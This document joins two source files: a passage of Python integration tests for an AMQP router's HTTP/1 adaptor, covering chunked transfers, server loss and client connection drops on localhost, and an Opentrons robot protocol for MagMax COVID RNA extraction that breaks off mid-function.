self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# two 1.2MB chunk
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
def _do_request(self, client, tests):
for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1ClientCloseTestsMixIn(object):
"""
Generic test functions for simulating HTTP/1.x client connection drops.
"""
def client_request_close_test(self, server_port, client_port, server_mgmt):
"""
Simulate an HTTP client drop while sending a very large PUT request
"""
PING = {
"GET": [
(RequestMsg("GET", "/GET/test_04_client_request_close/ping",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)]
}
TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_04_client_request_close",
headers={
"Content-Length": "500000",
"Content-Type": "text/plain;charset=utf-8"
},
body=b'4' * (500000 - 19) + b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_04_client_request_close",
"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the sending of the PUT
# request
#
fake_request = b'PUT /PUT/test_04_client_request_close HTTP/1.1\r\n' \
+ b'Content-Length: 500000\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n' \
+ b'?' * 50000
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(5)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.close()
# since socket I/O is asynchronous wait until the request arrives
# at the server
expected = len(fake_request)
bytes_in = 0
while expected > bytes_in:
ri = server_mgmt.query(type="org.apache.qpid.dispatch.httpRequestInfo").get_entities()
bytes_in = ri[-1]['bytesIn'] if ri else 0 # most recent request at tail
sleep(0.1)
# now ensure the connection between the router and the HTTP server
# still functions:
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
def client_response_close_test(self, server_port, client_port):
"""
Simulate an HTTP client drop while the server is sending a very large
response message.
"""
PING = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_05_client_response_close/ping",
headers={"Content-Length": "1",
"content-type":
"text/plain;charset=utf-8"},
body=b'X'),
ResponseMsg(201, reason="Created",
headers={"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
big_headers = dict([('Huge%s' % i, chr(ord(b'0') + i) * 8000)
for i in range(10)])
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_05_client_response_close",
headers={
"Content-Length": "0",
"Content-Type": "text/plain;charset=utf-8"
}),
[ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(200,
reason="OK",
headers={"Content-Length": 1000000,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?' * 1000000)],
ResponseValidator(status=200)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the receipt of the
# response
#
fake_request = b'GET /GET/test_05_client_response_close HTTP/1.1\r\n' \
+ b'Content-Length: 0\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n'
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(TIMEOUT)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.recv(1)
fake_client.close()
#
# Verify the server is still reachable
#
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
|
Extração MagMax COVID - STARLAB.py
|
from opentrons.types import Point
import json
import os
import math
import threading
from time import sleep
metadata = {
'protocolName': 'USO_v6_station_b_M300_Pool_magmax',
'author': 'Nick <ndiehl@opentrons.com',
'apiLevel': '2.3'
}
NUM_SAMPLES = 96 # start with 8 samples, slowly increase to 48, then 94 (max is 64)
ELUTION_VOL = 50
STARTING_VOL = 540
WASH_VOL = 500
POOL = False
TIP_TRACK = False
PARK = True
# Definitions for deck light flashing
class CancellationToken:
def __init__(self):
self.is_continued = False
def set_true(self):
self.is_continued = True
def set_false(self):
self.is_continued = False
def turn_on_blinking_notification(hardware, pause):
while pause.is_continued:
hardware.set_lights(rails=True)
sleep(1)
hardware.set_lights(rails=False)
sleep(1)
def create_thread(ctx, cancel_token):
t1 = threading.Thread(target=turn_on_blinking_notification, args=(ctx._hw_manager.hardware, cancel_token))
t1.start()
return t1
# Start protocol
def run(ctx):
# Setup for flashing lights notification to empty trash
# cancellationToken = CancellationToken()
# load labware and pipettes
num_cols = math.ceil(NUM_SAMPLES/8)
tips300 = [ctx.load_labware('starlab_96_tiprack_300ul', slot, '200µl filtertiprack')
for slot in ['3', '6', '8', '9', '7']]
if PARK:
parkingrack = ctx.load_labware(
'starlab_96_tiprack_300ul', '10', 'empty tiprack for parking')
if POOL:
parking_spots = parkingrack.rows()[0]
else:
parking_spots = parkingrack.rows()[0][:num_cols]
else:
tips300.insert(0, ctx.load_labware('starlab_96_tiprack_300ul', '10',
'200µl filtertiprack'))
        parking_spots = [None for _ in range(12)]
m300 = ctx.load_instrument(
'p300_multi_gen2', 'left', tip_racks=tips300)
magdeck = ctx.load_module('magnetic module gen2', '4')
magdeck.disengage()
magheight = 6.5
magplate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
# magplate = magdeck.load_labware('biorad_96_wellplate_200ul_pcr')
tempdeck = ctx.load_module('Temperature Module Gen2', '1')
flatplate = tempdeck.load_labware(
'opentrons_96_aluminumblock_nest_wellplate_100ul',)
waste = ctx.load_labware('nest_1_reservoir_195ml', '11',
'Liquid Waste').wells()[0].top()
etoh = ctx.load_labware(
'nest_1_reservoir_195ml', '2', 'EtOH reservoir').wells()[0:]
res1 = ctx.load_labware(
'nest_12_reservoir_15ml', '5', 'reagent reservoir 1')
wash1 = res1.wells()[:4]
elution_solution = res1.wells()[-1]
if POOL:
mag_samples_m = magplate.rows()[0][:num_cols] + magplate.rows()[0][8:8+math.ceil(num_cols/2)]
elution_samples_m = flatplate.rows()[0][:num_cols] + flatplate.rows()[0][8:8+math.ceil(num_cols/2)]
else:
mag_samples_m = magplate.rows()[0][:num_cols]
elution_samples_m = flatplate.rows()[0][:num_cols]
magdeck.disengage() # just in case
#tempdeck.set_temperature(20)
m300.flow_rate.aspirate = 50
m300.flow_rate.dispense = 150
m300.flow_rate.blow_out = 300
folder_path = '/data/B'
tip_file_path = folder_path + '/tip_log.json'
tip_log = {'count': {}}
if TIP_TRACK and not ctx.is_simulating():
if os.path.isfile(tip_file_path):
with open(tip_file_path) as json_file:
data = json.load(json_file)
if 'tips300' in data:
tip_log['count'][m300] = data['tips300']
else:
tip_log['count'][m300] = 0
else:
tip_log['count'][m300] = 0
else:
tip_log['count'] = {m300: 0}
tip_log['tips'] = {
m300: [tip for rack in tips300 for tip in rack.rows()[0]]}
tip_log['max'] = {m300: len(tip_log['tips'][m300])}
def pick_up(pip, loc=None):
nonlocal tip_log
if tip_log['count'][pip] == tip_log['max'][pip] and not loc:
ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \
resuming.')
pip.reset_tipracks()
tip_log['count'][pip] = 0
if loc:
pip.pick_up_tip(loc)
else:
pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])
tip_log['count'][pip] += 1
switch = True
drop_count = 0
drop_threshold = 240 # number of tips trash will accommodate before prompting user to empty
def drop(pip):
nonlocal switch
nonlocal drop_count
side = 30 if switch else -18
drop_loc = ctx.loaded_labwares[12].wells()[0].top().move(
Point(x=side))
pip.drop_tip(drop_loc)
switch = not switch
drop_count += 8
if drop_count == drop_threshold:
# Setup for flashing lights notification to empty trash
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty tips from waste before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
drop_count = 0
waste_vol = 0
waste_threshold = 185000
def remove_supernatant(vol, park=False):
def waste_track(vol):
nonlocal waste_vol
if waste_vol + vol >= waste_threshold:
# Setup for flashing lights notification to empty liquid waste
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty liquid waste (slot 11) before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
waste_vol = 0
waste_vol += vol
m300.flow_rate.aspirate = 30
num_trans = math.ceil(vol/200)
vol_per_trans = vol/num_trans
for m, spot in zip(mag_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
            loc = m.bottom(0.8).move(Point(x=side*2.5))  # changed from 0.5 to 0.8 and 3 to 2.5
for _ in range(num_trans):
waste_track(vol_per_trans)
if m300.current_volume > 0:
m300.dispense(m300.current_volume, m.top()) # void air gap if necessary
m300.move_to(m.center())
m300.transfer(vol_per_trans, loc, waste, new_tip='never',
air_gap=10)
#m300.blow_out(waste)
m300.air_gap(10)
drop(m300)
        m300.flow_rate.aspirate = 50  # changed from 150
def wash(wash_vol, source, mix_reps, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_vol/200)
vol_per_trans = wash_vol/num_trans
wash_vol_rem = wash_vol
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.8).move(Point(x=side*2.5))  # changed from 0.5 to 0.8 and 3 to 2.5
src = source[i//(12//len(source))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source
m300.air_gap(20)
m300.mix(mix_reps, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_vol_rem+40, park=park) #+40
def wash_etoh(wash_etoh_vol, source_etoh, mix_reps_etoh, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_etoh_vol/200)
vol_per_trans = wash_etoh_vol/num_trans
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.5).move(Point(x=side*2.5))  # changed from 0.5, and 3 to 2.5
src = source_etoh[i//(12//len(source_etoh))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source_etoh
m300.air_gap(20)
m300.mix(mix_reps_etoh, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_etoh_vol+40, park=park) #+40
def elute(vol, park=True):
# resuspend beads in elution
for m, spot in zip(mag_samples_m, parking_spots):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.8).move(Point(x=side*2.5))  # changed from 0.5 to 0.8 and 3 to 2.5
m300.aspirate(vol, elution_solution)
m300.move_to(m.center())
m300.dispense(vol, loc)
m300.mix(10, 0.8*vol, loc)
m300.blow_out(m.bottom(5))
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
ctx.delay(minutes=5, msg='Incubating off magnet at room temperature \
for 5 minutes')
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on magnet at room temperature \
for 5 minutes')
for m, e, spot in zip(mag_samples_m, elution_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
            loc = m.bottom(0.8).move(Point(x=side*2.5))  # changed from 0.5 to 0.8 and 3 to 2.5
m300.transfer(40, loc, e.bottom(5), air_gap=20, new_tip='never')
